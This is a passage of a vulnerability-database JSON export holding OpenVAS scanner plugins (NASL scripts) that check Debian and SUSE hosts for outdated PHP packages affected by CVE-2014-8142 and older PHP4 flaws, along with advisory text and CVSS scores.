vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36Two additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-04-06T00:00:00", "published": "2014-12-31T00:00:00", "id": "OPENVAS:1361412562310703117", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703117", "title": "Debian Security Advisory DSA 3117-1 (php5 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3117.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3117-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703117\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_name(\"Debian Security Advisory DSA 3117-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-31 00:00:00 +0100 (Wed, 31 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3117.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36Two additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-22T16:39:33", "bulletinFamily": "scanner", "description": "This host is installed with PHP and is\n prone to use-after-free vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-01-07T00:00:00", "id": "OPENVAS:1361412562310805411", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805411", "title": "PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_use_after_free_vuln_jan15.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805411\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-07 10:42:19 +0530 (Wed, 07 Jan 2015)\");\n script_name(\"PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is\n prone to use-after-free vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to Use-after-free\n vulnerability in the process_nested_data function in ext/standard/var\n _unserializer.re in PHP.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code via a crafted unserialize call.\");\n\n script_tag(name:\"affected\", value:\"PHP versions 5.4.x before 5.4.36,\n 5.5.x before 5.5.20 and 5.6.x before 5.6.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.36\n or 5.5.20 or 5.6.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/60920\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=68594\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.[4-6]\"){\n if(version_in_range(version:phpVer, test_version:\"5.4.0\", test_version2:\"5.4.35\")||\n version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.19\")||\n version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.3\")){\n report = report_fixed_ver(installed_version:phpVer, fixed_version:\"5.4.36/5.5.20/5.6.4\");\n security_message(data:report, port:phpPort);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:31", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65134", "id": "OPENVAS:65134", "title": "SLES9: Security update for PHP4", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020404.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65134);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:09", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065134", "id": "OPENVAS:136141256231065134", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020404.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65134\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:52", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65465", "id": "OPENVAS:65465", "title": "SLES9: Security update for PHP4", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020183.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65465);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php4\", rpm:\"apache2-mod_php4~4.3.4~43.22\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:12", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065465", "id": "OPENVAS:136141256231065465", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020183.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65465\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php4\", rpm:\"apache2-mod_php4~4.3.4~43.22\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 